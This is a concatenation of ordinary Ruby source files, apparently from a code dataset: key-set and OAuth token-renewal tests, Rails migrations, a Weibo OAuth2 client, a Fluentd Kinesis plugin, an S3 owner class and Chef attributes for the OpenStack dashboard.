Kdb::Key.new("user/app1/setting2"),
Kdb::Key.new("user/app1/setting3"),
Kdb::Key.new("user/app2/setting1"),
Kdb::Key.new("user/app2/common/setting1"),
Kdb::Key.new("user/app2/common/setting2"),
Kdb::Key.new("user/app2/setting2"),
Kdb::Key.new("user/app3/setting1")
]
assert_equal 8, ks.size
app2 = ks.cut Kdb::Key.new("user/app2")
assert_equal 4, app2.size
assert_equal 4, ks.size
assert_equal "user/app1/setting1", ks[0].name
assert_equal "user/app1/setting2", ks[1].name
assert_equal "user/app1/setting3", ks[2].name
assert_equal "user/app3/setting1", ks[3].name
assert_equal "user/app2/common/setting1", app2[0].name
assert_equal "user/app2/common/setting2", app2[1].name
assert_equal "user/app2/setting1", app2[2].name
assert_equal "user/app2/setting2", app2[3].name
app4 = ks.cut Kdb::Key.new("user/app4")
assert_equal 4, ks.size
assert_equal 0, app4.size
end
end
# KeySet#to_a converts the key set to a plain Ruby Array holding the same
# keys in the same order, while leaving the KeySet itself untouched.
def test_keySet_to_array
assert_nothing_raised do
# parenthesized call avoids the `KeySet.new (…)` ambiguity warning
ks = Kdb::KeySet.new((0..5).map { |i| Kdb::Key.new "user/key#{i}" })
a = ks.to_a
# the conversion must not change the receiver's type
assert_instance_of Kdb::KeySet, ks
assert_instance_of Array, a
assert_equal ks.size, a.size
# element-wise comparison; `each` is preferred over `for`, which leaks
# its loop variable into the enclosing scope
(0..5).each do |i|
assert_equal ks[i], a[i]
end
end
end
# KeySet#empty? is true for a fresh set, false while it holds keys, and
# true again once every key has been popped.
def test_keySet_empty
assert_nothing_raised do
ks = Kdb::KeySet.new
assert ks.empty?
ks << Kdb::Key.new("user/k1")
assert ! ks.empty?
ks << Kdb::Key.new("user/k2")
assert ! ks.empty?
ks.pop
assert ! ks.empty?
ks.pop
assert ks.empty?
# popping beyond the last element must not raise and stays empty
ks.pop
assert ks.empty?
end
end
# #size and #length are aliases; both must track every append and pop,
# and #pop on an empty set returns nil without changing the size.
def test_keySet_length
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_equal 0, ks.size
assert_equal 0, ks.length
ks << Kdb::Key.new("user/k1")
assert_equal 1, ks.size
assert_equal 1, ks.length
(2..10).map do |i|
ks << Kdb::Key.new("user/sw/org/my_app/k#{i}")
assert_equal i, ks.size
assert_equal i, ks.length
end
(0..9).reverse_each do |i|
assert_not_nil ks.pop
assert_equal i, ks.size
assert_equal i, ks.length
end
# to be explicit
assert_equal 0, ks.size
assert_equal 0, ks.length
assert_nil ks.pop
assert_equal 0, ks.size
assert_equal 0, ks.length
end
end
# KeySet#delete_at removes the key at the given index and returns it
# (mirroring Array#delete_at); an out-of-range index returns nil. The
# plain Array `a` is kept in sync as the reference for each step.
def test_keySet_delete_by_index
assert_nothing_raised do
a = (0..9).map { |i|
Kdb::Key.new "user/sw/org/my_app/k#{i}"
}
ks = Kdb::KeySet.new a
assert_equal 10, ks.size
# delete from the middle
k = ks.delete_at 5
ak = a.delete_at 5
assert_equal 9, ks.size
assert_equal ak, k
# delete the first element; head must advance
k = ks.delete_at 0
ak = a.delete_at 0
assert_equal 8, ks.size
assert_equal ak, k
assert_equal a[0], ks.head
# delete the last element; tail must retreat
k = ks.delete_at(ks.size - 1)
ak = a.delete_at(a.size - 1)
assert_equal 7, ks.size
assert_equal ak, k
assert_equal a[a.size - 1], ks.tail
assert_nil ks.delete_at 10
end
end
# KeySet#delete accepts either a Key object or a key name String,
# removes the matching key and returns it; an unknown key/name yields
# nil. The plain Array `a` mirrors the expected remaining content.
def test_keySet_delete_by_lookup
assert_nothing_raised do
a = (0..9).map { |i|
Kdb::Key.new "user/sw/org/my_app/k#{i}"
}
ks = Kdb::KeySet.new a
assert_equal 10, ks.size
ak = a.delete_at 5
# delete by key
k = ks.delete ak
assert_equal ak, k
assert_equal 9, ks.size
ak = a.delete_at 0
k = ks.delete ak
assert_equal ak, k
assert_equal 8, ks.size
assert_nil ks.delete(Kdb::Key.new "user/doesn_t_exist")
# delete by name
ak = a.delete_at 0
k = ks.delete "user/sw/org/my_app/k1"
assert_equal ak, k
assert_equal 7, ks.size
ak = a.delete_at 6
k = ks.delete "user/sw/org/my_app/k9"
assert_equal ak, k
assert_equal 6, ks.size
assert_nil ks.delete("user/doesn_t_exist")
end
end
# KeySet#to_s joins "name: value" pairs with ", "; binary keys render as
# "(binary) length: <n>" instead of their raw bytes.
def test_keySet_to_s
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_equal '', ks.to_s
ks << Kdb::Key.new("user/k1", value: "v1")
assert_equal "user/k1: v1", ks.to_s
ks << Kdb::Key.new("user/k2", value: "v2")
assert_equal "user/k1: v1, user/k2: v2", ks.to_s
ks << Kdb::Key.new("user/k3", flags: Kdb::KEY_BINARY, value: "\x00\x00")
expected = "user/k1: v1, user/k2: v2, user/k3: (binary) length: 2"
assert_equal expected, ks.to_s
end
end
# KeySet#pretty_print writes one "name: value" line per key to stdout;
# an empty key set prints nothing (and nothing goes to stderr).
def test_keySet_pretty_print
assert_nothing_raised do
ks = Kdb::KeySet.new
out, err = capture_output { ks.pretty_print }
assert_equal '', out
assert_equal '', err
ks << Kdb::Key.new("user/k1", value: "v1")
ks << Kdb::Key.new("user/k2", value: "v2")
ks << Kdb::Key.new("user/k3", value: "v3")
out, err = capture_output { ks.pretty_print }
# plain <<EOF heredoc: body and terminator must stay at column 0
expected = <<EOF
user/k1: v1
user/k2: v2
user/k3: v3
EOF
assert_equal expected, out
assert_equal '', err
end
end
end
| 22.495376 | 79 | 0.582301 |
4ad6ffe323c2feb26ae2b33310e0466e190cf16c | 3,827 | require "rails_helper"
describe Eve::AccessToken, type: :model do
# #expired? simply mirrors Character#token_expired? for the wrapped
# character.
describe "#expired?" do
subject { described_class.new(character).expired? }
let(:character) { instance_double(Character, token_expired?: true) }
it { is_expected.to eq true }
context "when not expired" do
let(:character) { instance_double(Character, token_expired?: false) }
it { is_expected.to eq false }
end
end
# #renew! refreshes an expired token via OAuth and persists the new
# credentials on the character; a still-valid token is left untouched
# and no ESI request is made.
describe "#renew!" do
subject { described_class.new(character).renew! }
let(:character) { create(:character, :with_expired_token) }
let(:oauth_token) do
stub_oauth_token(
token: "new-token",
expires_at: 1.day.from_now.midnight,
refresh_token: "new-refresh-token"
)
end
before do
allow(oauth_token).to receive(:refresh!).and_return(oauth_token)
end
it "updates character's access token" do
expect { subject }.to change { character.reload.token }.to("new-token")
end
it "updates character's refresh token" do
expect { subject }.to change { character.reload.refresh_token }.to("new-refresh-token")
end
it "updates character's token expiration time" do
expect { subject }
.to change { character.reload.token_expires_at }.to(1.day.from_now.midnight)
end
context "with current token still valid" do
let(:character) { create(:character) }
it "does not update character's access token" do
expect { subject }.not_to change { character.reload.token }
end
it "does not update character's refresh token" do
expect { subject }.not_to change { character.reload.refresh_token }
end
it "does not update character's token expiration time" do
expect { subject }.not_to change { character.reload.token_expires_at }
end
it "does not send requests to ESI" do
expect(subject).to satisfy do
expect(oauth_token).not_to have_received(:refresh!)
end
end
end
# Authorization errors: the stored refresh token is unusable, so it is
# voided before the error propagates.
%w[
invalid_token
invalid_grant
].each do |error_code|
context "when esi responds with #{error_code} error" do
before do
oauth_error = stubbed_oauth_error(error_code)
allow(oauth_token).to receive(:refresh!).and_raise(oauth_error)
end
it "voids character's refresh token" do
expect { subject }.to raise_error do
expect(character).to be_refresh_token_voided
end
end
it "raises an error" do
expect { subject }.to raise_error(described_class::Error, /#{error_code}/)
end
end
end
# Protocol-level errors: the refresh token itself may still be good, so
# it must NOT be voided — only the error is re-raised.
%w[
invalid_request
invalid_client
unsupported_grant_type
invalid_scope
].each do |error_code|
context "when esi responds with #{error_code} error" do
before do
oauth_error = stubbed_oauth_error(error_code)
allow(oauth_token).to receive(:refresh!).and_raise(oauth_error)
end
it "raises an error" do
expect { subject }.to raise_error(described_class::Error, /#{error_code}/)
end
it "does not void character's refresh token" do
expect { subject }.to raise_error do
expect(character).not_to be_refresh_token_voided
end
end
end
end
end
# Builds an OAuth2::AccessToken instance spy carrying the given
# credentials (static fallbacks cover explicitly-passed nils) and stubs
# OAuth2::AccessToken.from_hash so the code under test receives it.
def stub_oauth_token(token:, refresh_token: nil, expires_at: nil)
instance_spy(
OAuth2::AccessToken,
token: token || "token-abc",
expires_at: expires_at || 1.day.from_now,
refresh_token: refresh_token || "refresh-token-abc"
).tap do |stubbed_token|
allow(OAuth2::AccessToken).to receive(:from_hash).and_return(stubbed_token)
end
end
# Creates an OAuth2::Error carrying only the given error code.
# `allocate` bypasses the initializer (which would require a full HTTP
# response object); only @code is set because that is all the specs read.
def stubbed_oauth_error(code)
OAuth2::Error.allocate.tap do |e|
e.instance_variable_set(:@code, code)
end
end
end
| 28.774436 | 93 | 0.644892 |
b9cbefaab185215180422c8fc24634954ebd07f9 | 70 | class Mood < ActiveRecord::Base
validates :name, presence: true
end
| 17.5 | 33 | 0.757143 |
87a2ec7572b2a01f8e0942e28cacad8ff2869a2e | 295 | class CreateLikes < ActiveRecord::Migration[6.0]
# Builds the polymorphic `likes` join table: user_id plus the
# likeable_type/likeable_id pair reference any likeable record; the
# composite unique index guarantees a user can like a record only once.
def change
create_table :likes do |t|
t.integer :user_id
t.references :likeable, polymorphic: true, index: true
t.timestamps
end
add_index :likes, [:user_id, :likeable_type, :likeable_id], unique: true
end
end
| 22.692308 | 76 | 0.681356 |
ab81bc988abff74a47e42e4bcf4970d06c653270 | 163 | class CreateSubmissionRecords < ActiveRecord::Migration
# Creates the submission_records table; besides the implicit id it only
# tracks non-null created_at/updated_at timestamps.
def change
create_table :submission_records do |t|
t.timestamps null: false
end
end
end
| 18.111111 | 55 | 0.736196 |
217d441498b76adfd20f6a495374cd66dd55e54f | 878 | # frozen_string_literal: true
# Specs for T12n's define_attr DSL: a serializer block is mandatory, may
# take at most one argument, and is normalized so every stored
# serializer reports arity 1.
RSpec.describe "attribute definition" do
before do
@t12n = T12n.start
end
it "defined attributes must provide a block" do
expect do
@t12n.define_schema :x do
define_attr :a
end
end.to raise_error(T12n::ArgumentError, "No block given")
end
it "arity of defined attributes cannot be more than one" do
expect do
@t12n.define_schema :x do
define_attr(:a) { |x, y| }
end
end.to raise_error(T12n::ArgumentError, "Unexpected proc arity: 2")
end
# zero-arg blocks, one-arg blocks and &:symbol shorthand all end up as
# arity-1 serializers
it "attribute serializers have an arity of one" do
@t12n.define_schema :x do
attrs(:attr1)
define_attr(:attr2) { }
define_attr(:attr3) { |obj| }
define_attr(:attr4, &:y)
end
arities = @t12n.fetch_schema(:x).attrs.map { |a| a.serializer.arity }
expect(arities).to eq([1, 1, 1, 1])
end
end
| 23.72973 | 73 | 0.638952 |
260532b9f7dafe3288b977bf7ed4ef5ed4dd541e | 743 | module GitCompound
module Worker
# Worker that checks if unwanted circular dependency exists
#
class CircularDependencyChecker < Worker
  def visit_component(component)
    @element = component
    ensure_no_cycle!
  end

  def visit_manifest(manifest)
    @element = manifest
    ensure_no_cycle!
  end

  private

  # An element listed among its own ancestors closes a dependency cycle;
  # report it with its type (component/manifest) and name.
  def ensure_no_cycle!
    return unless @element.ancestors.include?(@element)
    type = @element.class.name.downcase
    raise CircularDependencyError,
          "Circular dependency detected in #{type} `#{@element.name}`!"
  end
end
end
end
| 23.21875 | 66 | 0.651413 |
ace25dc243afd366663f060a15eef7d52c39a0bf | 3,168 | require 'oauth2'
module WeiboOAuth2
# OAuth2 client for the Sina Weibo API v2.
#
# Wraps OAuth2::Client with Weibo's endpoints and exposes memoized API
# proxies (users, statuses, ...) once an access token is present.
class Client < OAuth2::Client
  # Falls back to the globally configured WeiboOAuth2::Config
  # key/secret when explicit credentials are not supplied.
  def initialize(client_id='', client_secret='', opts={}, &block)
    client_id = WeiboOAuth2::Config.api_key if client_id.empty?
    client_secret = WeiboOAuth2::Config.api_secret if client_secret.empty?
    super
    @site = "https://api.weibo.com/2/"
    @options[:authorize_url] = '/oauth2/authorize'
    @options[:token_url] = '/oauth2/access_token'
  end

  # Authorization URL for the browser redirect; missing client_id,
  # response_type and redirect_uri are filled in from defaults.
  def authorize_url(params={})
    params[:client_id] = @id unless params[:client_id]
    params[:response_type] = 'code' unless params[:response_type]
    params[:redirect_uri] = WeiboOAuth2::Config.redirect_uri unless params[:redirect_uri]
    super
  end

  # Exchanges an authorization code for an access token. Responses are
  # parsed as JSON and the token is sent in "OAuth2 <token>" format.
  def get_token(params, access_token_opts={})
    params = params.merge(:parse => :json)
    access_token_opts = access_token_opts.merge(:header_format => "OAuth2 %s",
                                                :param_name => "access_token")
    super
  end

  # Like #get_token, but memoizes the token on the client so the API
  # proxies below become usable.
  #
  # BUG FIX: the previous implementation called
  # `get_token(params, access_token_opts={})`, which re-assigned the
  # parameter to an empty hash and silently discarded any caller-supplied
  # options; they are now forwarded unchanged.
  def get_and_restore_token(params, access_token_opts={})
    @access_token = get_token(params, access_token_opts)
  end

  # Restores a previously persisted token (e.g. from a session hash).
  # Accepts both string and symbol keys; mutates the given hash.
  def get_token_from_hash(hash)
    access_token = hash.delete('access_token') || hash.delete(:access_token)
    opts = {:expires_at => hash["expires"] || hash[:expires],
            :header_format => "OAuth2 %s",
            :param_name => "access_token"}
    @access_token = WeiboOAuth2::AccessToken.new(self, access_token, opts)
  end

  # True once an access token has been obtained or restored.
  def authorized?
    !!@access_token
  end

  # --- Memoized API proxies; all return nil until #authorized? ---

  def users
    @users ||= WeiboOAuth2::Api::V2::Users.new(@access_token) if @access_token
  end

  def statuses
    # fixed memoization ivar typo (@statues -> @statuses)
    @statuses ||= WeiboOAuth2::Api::V2::Statuses.new(@access_token) if @access_token
  end

  def comments
    @comments ||= WeiboOAuth2::Api::V2::Comments.new(@access_token) if @access_token
  end

  def friendships
    @friendships ||= WeiboOAuth2::Api::V2::Friendships.new(@access_token) if @access_token
  end

  def account
    @account ||= WeiboOAuth2::Api::V2::Account.new(@access_token) if @access_token
  end

  def favorites
    @favorites ||= WeiboOAuth2::Api::V2::Favorites.new(@access_token) if @access_token
  end

  def trends
    @trends ||= WeiboOAuth2::Api::V2::Trends.new(@access_token) if @access_token
  end

  def tags
    @tags ||= WeiboOAuth2::Api::V2::Tags.new(@access_token) if @access_token
  end

  def register
    @register ||= WeiboOAuth2::Api::V2::Register.new(@access_token) if @access_token
  end

  def search
    @search ||= WeiboOAuth2::Api::V2::Search.new(@access_token) if @access_token
  end

  def short_url
    @short_url ||= WeiboOAuth2::Api::V2::ShortUrl.new(@access_token) if @access_token
  end

  def suggestions
    @suggestions ||= WeiboOAuth2::Api::V2::Suggestions.new(@access_token) if @access_token
  end

  def remind
    @remind ||= WeiboOAuth2::Api::V2::Remind.new(@access_token) if @access_token
  end

  # Authorization-code grant strategy helper.
  def auth_code
    @auth_code ||= WeiboOAuth2::Strategy::AuthCode.new(self)
  end
end
end | 31.058824 | 113 | 0.631944 |
2800f44745ceb42204caa621b1744e3f95a0268f | 713 | # NOTE:
#
# Uses the value of node['private_chef']['postgresql']['username'] as
# the user to run the database-creation psql command

# Whyrun mode is supported: under `chef-client --why-run` the
# converge_by description below is reported instead of executed.
def whyrun_supported?
true
end

use_inline_resources

# Idempotently creates the PostgreSQL database named by the resource:
# CREATE DATABASE is only issued when pg_database has no matching row,
# so repeated converges are no-ops.
action :create do
EcPostgres.with_connection(node) do |connection|
result = connection.exec("SELECT datname FROM pg_database WHERE datname='#{new_resource.database}'")
if result.ntuples == 0
converge_by("Create database #{new_resource.database}") do
# owner clause is omitted entirely when no owner is configured
owner = "WITH OWNER #{new_resource.owner}" if new_resource.owner
connection.exec("CREATE DATABASE \"#{new_resource.database}\" #{owner} TEMPLATE #{new_resource.template} ENCODING '#{new_resource.encoding}';")
end
end
end
end
| 31 | 153 | 0.71669 |
ed44aac27098a324343eb35fa653c8cd1e7ac1dc | 2,956 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_02_01
module Models
#
# Information gained from troubleshooting of specified resource.
#
class TroubleshootingDetails
include MsRestAzure
# @return [String] The id of the get troubleshoot operation.
attr_accessor :id
# @return [String] Reason type of failure.
attr_accessor :reason_type
# @return [String] A summary of troubleshooting.
attr_accessor :summary
# @return [String] Details on troubleshooting results.
attr_accessor :detail
# @return [Array<TroubleshootingRecommendedActions>] List of recommended
# actions.
attr_accessor :recommended_actions
#
# Mapper for TroubleshootingDetails class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'TroubleshootingDetails',
type: {
name: 'Composite',
class_name: 'TroubleshootingDetails',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
reason_type: {
client_side_validation: true,
required: false,
serialized_name: 'reasonType',
type: {
name: 'String'
}
},
summary: {
client_side_validation: true,
required: false,
serialized_name: 'summary',
type: {
name: 'String'
}
},
detail: {
client_side_validation: true,
required: false,
serialized_name: 'detail',
type: {
name: 'String'
}
},
recommended_actions: {
client_side_validation: true,
required: false,
serialized_name: 'recommendedActions',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'TroubleshootingRecommendedActionsElementType',
type: {
name: 'Composite',
class_name: 'TroubleshootingRecommendedActions'
}
}
}
}
}
}
}
end
end
end
end
| 29.267327 | 86 | 0.492896 |
87cbbbc546f0decfd2de65c3ce878c490a4d1f2f | 1,252 | module OldAWS
module S3
# Entities in S3 have an associated owner (the person who created them). The owner is a canonical representation of an
# entity in the S3 system. It has an <tt>id</tt> and a <tt>display_name</tt>.
#
# These attributes can be used when specifying a ACL::Grantee for an ACL::Grant.
#
# You can retrieve the owner of the current account by calling Owner.current.
class Owner
undef_method :id if method_defined?(:id) # Get rid of Object#id
include SelectiveAttributeProxy

class << self
# The owner of the current account.
def current
response = Service.get('/')
new(response.parsed['owner']) if response.parsed['owner']
end
memoized :current
end

def initialize(attributes = {}) #:nodoc:
@attributes = attributes
end

# Two owners are equal when their id/display_name based hashes match.
def ==(other_owner) #:nodoc:
hash == other_owner.hash
end

def hash #:nodoc:
[id, display_name].join.hash
end

private
# Only id and display_name may be proxied via SelectiveAttributeProxy.
def proxiable_attribute?(name)
valid_attributes.include?(name)
end

def valid_attributes
%w(id display_name)
end
end
end
end | 28.454545 | 123 | 0.594249 |
ed91deb4c73bcfb75ebca4443f12a8a524b178d5 | 2,682 | require File.expand_path('../boot', __FILE__)
# Pick the frameworks you want:
# require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "active_resource/railtie"
require "sprockets/railtie"
require "rails/test_unit/railtie"
Bundler.require
require "bootstrap_active_nav"
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
# config.autoload_paths += %W(#{config.root}/extras)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Enforce whitelist mode for mass assignment.
# This will create an empty whitelist of attributes available for mass-assignment for all models
# in your app. As such, your models will need to explicitly whitelist or blacklist accessible
# parameters by using an attr_accessible or attr_protected declaration.
# config.active_record.whitelist_attributes = true
# Enable the asset pipeline
config.assets.enabled = true
# Version of your assets, change this if you want to expire all your assets
config.assets.version = '1.0'
end
end
| 42.571429 | 100 | 0.740492 |
18cd47406aff6a240eedc514691f8c68cdf67e3c | 182 | class CreateMessages < ActiveRecord::Migration[5.0]
# Builds the messages table: sender name, message body and the standard
# created_at/updated_at timestamps.
def change
  create_table :messages do |t|
    t.string :name, :message
    t.timestamps
  end
end
end
| 16.545455 | 51 | 0.653846 |
f897943bdb202d45a5f4cc68490cbaee0e6db42f | 2,283 | #
# Copyright 2014-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require 'fluent/plugin/kinesis'
require 'fluent/plugin/kinesis_helper/aggregator'
module Fluent
module Plugin
# Fluentd output that writes buffered events to a Kinesis stream using
# record aggregation: many log records are packed into a single Kinesis
# record that shares one partition key.
class KinesisStreamsAggregatedOutput < KinesisOutput
Fluent::Plugin.register_output('kinesis_streams_aggregated', self)
include KinesisHelper::Aggregator::Mixin

RequestType = :streams_aggregated
# PutRecords batch request limits used by KinesisHelper::API::BatchRequest
BatchRequestLimitCount = 100_000
BatchRequestLimitSize = 1024 * 1024
include KinesisHelper::API::BatchRequest

config_param :stream_name, :string
# When set, every aggregated record uses this partition key instead of a
# random one (pins all traffic to a single shard).
config_param :fixed_partition_key, :string, default: nil

def configure(conf)
super
@partition_key_generator = create_partition_key_generator
# reserve room for the aggregation envelope + partition key overhead
@batch_request_max_size -= offset
@max_record_size -= offset
end

def format(tag, time, record)
format_for_api do
[@data_formatter.call(tag, time, record)]
end
end

# Sends each batch as ONE aggregated Kinesis record under a single
# partition key.
def write(chunk)
write_records_batch(chunk) do |batch|
key = @partition_key_generator.call
records = batch.map{|(data)|data}
client.put_records(
stream_name: @stream_name,
records: [{
partition_key: key,
data: aggregator.aggregate(records, key),
}],
)
end
end

# Memoized per-record size overhead; key.size*2 presumably accounts for
# the partition key appearing twice in the aggregate — TODO confirm.
def offset
@offset ||= AggregateOffset + @partition_key_generator.call.size*2
end

private

def size_of_values(record)
super(record) + RecordOffset
end

# Returns a lambda producing either a random 32-char hex key per call or
# the configured fixed key.
def create_partition_key_generator
if @fixed_partition_key.nil?
->() { SecureRandom.hex(16) }
else
->() { @fixed_partition_key }
end
end
end
end
end
| 28.898734 | 78 | 0.657468 |
01ca3f93bd5d0f8492b65bd595091e75907b760c | 10,516 | # encoding: UTF-8
#
# Cookbook Name:: openstack-dashboard
# Attributes:: default
#
# Copyright 2012, AT&T, Inc.
# Copyright 2013-2014, IBM, Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Set to some text value if you want templated config files
# to contain a custom banner at the top of the written file
default['openstack']['dashboard']['custom_template_banner'] = '
# This file autogenerated by Chef
# Do not edit, changes will be overwritten
'
default['openstack']['dashboard']['debug'] = false
# The Keystone role used by default for users logging into the dashboard
default['openstack']['dashboard']['keystone_default_role'] = '_member_'
# This is the name of the Chef role that will install the Keystone Service API
default['openstack']['dashboard']['keystone_service_chef_role'] = 'keystone'
default['openstack']['dashboard']['server_hostname'] = nil
default['openstack']['dashboard']['use_ssl'] = false
default['openstack']['dashboard']['ssl']['cert_url'] = nil
default['openstack']['dashboard']['ssl']['key_url'] = nil
# When using a remote certificate and key, the names of the actual installed certificate
# and key in the file system are determined by the following two attributes.
# If you want the name of the installed files to match the name of the files from the URL,
# they need to be manually set below, if not the conventional horizon.* names will be used.
default['openstack']['dashboard']['ssl']['cert'] = 'horizon.pem'
default['openstack']['dashboard']['ssl']['key'] = 'horizon.key'
# List of hosts/domains the dashboard can serve. This should be changed, a '*'
# allows everything
default['openstack']['dashboard']['allowed_hosts'] = ['*']
default['openstack']['dashboard']['swift']['enabled'] = 'False'
default['openstack']['dashboard']['theme'] = 'default'
default['openstack']['dashboard']['apache']['sites-path'] = "#{node['apache']['dir']}/openstack-dashboard"
default['openstack']['dashboard']['http_port'] = 80
default['openstack']['dashboard']['https_port'] = 443
default['openstack']['dashboard']['secret_key_content'] = nil
default['openstack']['dashboard']['webroot'] = '/'
case node['platform_family']
when 'fedora', 'rhel'
default['openstack']['dashboard']['horizon_user'] = 'apache'
default['openstack']['dashboard']['horizon_group'] = 'apache'
default['openstack']['dashboard']['secret_key_path'] = '/usr/share/openstack-dashboard/openstack_dashboard/local/.secret_key_store'
default['openstack']['dashboard']['ssl']['dir'] = '/etc/pki/tls'
default['openstack']['dashboard']['local_settings_path'] = '/etc/openstack-dashboard/local_settings'
default['openstack']['dashboard']['django_path'] = '/usr/share/openstack-dashboard'
default['openstack']['dashboard']['login_url'] = "#{node['openstack']['dashboard']['webroot']}auth/login/"
default['openstack']['dashboard']['logout_url'] = "#{node['openstack']['dashboard']['webroot']}auth/logout/"
default['openstack']['dashboard']['login_redirect_url'] = node['openstack']['dashboard']['webroot']
# TODO(shep) - Fedora does not generate self signed certs by default
default['openstack']['dashboard']['platform'] = {
'mysql_python_packages' => ['MySQL-python'],
'db2_python_packages' => %w{python-ibm-db python-ibm-db-django python-ibm-db-sa},
'postgresql_python_packages' => ['python-psycopg2'],
'sqlite_python_packages' => [],
'horizon_packages' => ['openstack-dashboard'],
'memcache_python_packages' => ['python-memcached'],
'package_overrides' => ''
}
if node['platform_family'] == 'fedora'
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/conf.d/openstack-dashboard.conf"
else
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/sites-available/openstack-dashboard"
end
when 'suse'
default['openstack']['dashboard']['horizon_user'] = 'wwwrun'
default['openstack']['dashboard']['horizon_group'] = 'www'
default['openstack']['dashboard']['secret_key_path'] = '/srv/www/openstack-dashboard/openstack_dashboard/local/.secret_key_store'
default['openstack']['dashboard']['ssl']['dir'] = '/etc/ssl'
default['openstack']['dashboard']['local_settings_path'] = '/srv/www/openstack-dashboard/openstack_dashboard/local/local_settings.py'
default['openstack']['dashboard']['django_path'] = '/srv/www/openstack-dashboard'
default['openstack']['dashboard']['login_url'] = nil
default['openstack']['dashboard']['logout_url'] = nil
default['openstack']['dashboard']['login_redirect_url'] = nil
default['openstack']['dashboard']['platform'] = {
'mysql_python_packages' => ['python-mysql'],
'postgresql_python_packages' => ['python-psycopg2'],
'sqlite_python_packages' => [],
'horizon_packages' => ['openstack-dashboard'],
'memcache_python_packages' => ['python-python-memcached'],
'package_overrides' => ''
}
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/conf.d/openstack-dashboard.conf"
when 'debian'
default['openstack']['dashboard']['horizon_user'] = 'horizon'
default['openstack']['dashboard']['horizon_group'] = 'horizon'
default['openstack']['dashboard']['secret_key_path'] = '/var/lib/openstack-dashboard/secret_key'
default['openstack']['dashboard']['ssl']['dir'] = '/etc/ssl'
default['openstack']['dashboard']['local_settings_path'] = '/etc/openstack-dashboard/local_settings.py'
default['openstack']['dashboard']['django_path'] = '/usr/share/openstack-dashboard'
default['openstack']['dashboard']['login_url'] = nil
default['openstack']['dashboard']['logout_url'] = nil
default['openstack']['dashboard']['login_redirect_url'] = nil
default['openstack']['dashboard']['platform'] = {
'mysql_python_packages' => ['python-mysqldb'],
'postgresql_python_packages' => ['python-psycopg2'],
'memcache_python_packages' => ['python-memcache'],
'sqlite_python_packages' => [],
'package_overrides' => "-o Dpkg::Options::='--force-confold' -o Dpkg::Options::='--force-confdef'"
}
# lessc became node-less in 12.10
if node['lsb']['release'] > '12.04'
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/sites-available/openstack-dashboard.conf"
default['openstack']['dashboard']['platform']['horizon_packages'] = ['node-less', 'openstack-dashboard']
else
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/sites-available/openstack-dashboard"
default['openstack']['dashboard']['platform']['horizon_packages'] = ['lessc', 'openstack-dashboard']
end
end
default['openstack']['dashboard']['dash_path'] = "#{node['openstack']['dashboard']['django_path']}/openstack_dashboard"
if node['platform_family'] == 'suse'
default['openstack']['dashboard']['static_path'] = "#{node['openstack']['dashboard']['dash_path']}/static"
default['openstack']['dashboard']['stylesheet_path'] = "#{node['openstack']['dashboard']['dash_path']}/templates/_stylesheets.html"
else
default['openstack']['dashboard']['static_path'] = "#{node['openstack']['dashboard']['django_path']}/static"
default['openstack']['dashboard']['stylesheet_path'] = '/usr/share/openstack-dashboard/openstack_dashboard/templates/_stylesheets.html'
end
default['openstack']['dashboard']['wsgi_path'] = node['openstack']['dashboard']['dash_path'] + '/wsgi/django.wsgi'
default['openstack']['dashboard']['wsgi_socket_prefix'] = nil
default['openstack']['dashboard']['session_backend'] = 'signed_cookies'
default['openstack']['dashboard']['ssl_offload'] = false
default['openstack']['dashboard']['plugins'] = nil
default['openstack']['dashboard']['error_log'] = 'openstack-dashboard-error.log'
default['openstack']['dashboard']['access_log'] = 'openstack-dashboard-access.log'
default['openstack']['dashboard']['help_url'] = 'http://docs.openstack.org'
